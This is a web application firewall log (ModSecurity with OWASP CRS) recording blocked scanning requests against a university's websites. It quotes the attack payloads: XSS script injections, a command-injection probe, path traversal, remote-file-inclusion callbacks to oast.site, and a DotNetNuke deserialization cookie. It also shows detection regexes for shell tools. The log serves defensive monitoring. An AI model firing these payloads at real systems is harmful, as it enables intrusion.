[Tue Aug 29 11:42:28.389118 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NMCo-f0AAAdPLzkAAAAT"]
[Tue Aug 29 11:42:28.407510 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NMCo-f0AAAc92yMAAAAD"]
[Tue Aug 29 11:42:28.408520 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/doAs"] [unique_id "ZO13NMCo-f0AAAdSZMAAAAAX"]
[Tue Aug 29 11:42:28.410415 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NMCo-f0AAAdftSAAAAAG"]
[Tue Aug 29 11:42:28.417615 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13NMCo-f0AAAc-51gAAAAN"]
[Tue Aug 29 11:42:28.468373 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NMCo-f0AAAdV7bkAAAAa"]
[Tue Aug 29 11:42:29.369366 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NcCo-f0AAAdaZPcAAAAM"]
[Tue Aug 29 11:42:29.428028 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13NcCo-f0AAAdQ3ggAAAAV"]
[Tue Aug 29 11:42:29.681089 2023] [:error] [pid 1920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NcCo-f0AAAeAW6YAAAAu"]
[Tue Aug 29 11:42:29.682882 2023] [:error] [pid 1918] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NcCo-f0AAAd@3-cAAAAs"]
[Tue Aug 29 11:42:29.762561 2023] [:error] [pid 1921] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NcCo-f0AAAeB1oAAAAAv"]
[Tue Aug 29 11:42:29.816547 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NcCo-f0AAAdKXPUAAAAK"]
[Tue Aug 29 11:42:30.391584 2023] [:error] [pid 1914] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NsCo-f0AAAd64QUAAAAp"]
[Tue Aug 29 11:42:30.456206 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13NsCo-f0AAAeChW0AAAAw"]
[Tue Aug 29 11:42:30.503737 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NsCo-f0AAAdeQ1kAAAAQ"]
[Tue Aug 29 11:42:31.380148 2023] [:error] [pid 1913] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13N8Co-f0AAAd5nrIAAAAm"]
[Tue Aug 29 11:42:32.364508 2023] [:error] [pid 1924] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gxc6nwm8hptzhx.oast.site found within TX:1: cjmnbitjmimt14dgn26gxc6nwm8hptzhx.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OMCo-f0AAAeEDvEAAAAy"]
[Tue Aug 29 11:42:32.364722 2023] [:error] [pid 1920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gay3uo49ir4t19.oast.site found within TX:1: cjmnbitjmimt14dgn26gay3uo49ir4t19.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OMCo-f0AAAeAW6kAAAAu"]
[Tue Aug 29 11:42:32.370577 2023] [:error] [pid 1911] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g7xpyxwsq5i6q3.oast.site found within TX:1: cjmnbitjmimt14dgn26g7xpyxwsq5i6q3.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OMCo-f0AAAd3rG0AAAAe"]
[Tue Aug 29 11:42:32.395353 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13OMCo-f0AAAdKXPgAAAAK"]
[Tue Aug 29 11:42:32.397756 2023] [:error] [pid 1889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gkgm88j4uut8xh.oast.site found within TX:1: cjmnbitjmimt14dgn26gkgm88j4uut8xh.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OMCo-f0AAAdhH0cAAAAB"]
[Tue Aug 29 11:42:32.402899 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g8h8uthutqtjhu.oast.site found within TX:1: cjmnbitjmimt14dgn26g8h8uthutqtjhu.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OMCo-f0AAAcoNjEAAAAF"]
[Tue Aug 29 11:42:32.428405 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "journal.unla.ac.id"] [uri "/__"] [unique_id "ZO13OMCo-f0AAAdxUQkAAAAC"]
[Tue Aug 29 11:42:32.440273 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "informatika.unla.ac.id"] [uri "/__"] [unique_id "ZO13OMCo-f0AAAcoNjIAAAAF"]
[Tue Aug 29 11:42:32.455230 2023] [:error] [pid 1889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "pusatbahasa.unla.ac.id"] [uri "/__"] [unique_id "ZO13OMCo-f0AAAdhH0gAAAAB"]
[Tue Aug 29 11:42:32.462078 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 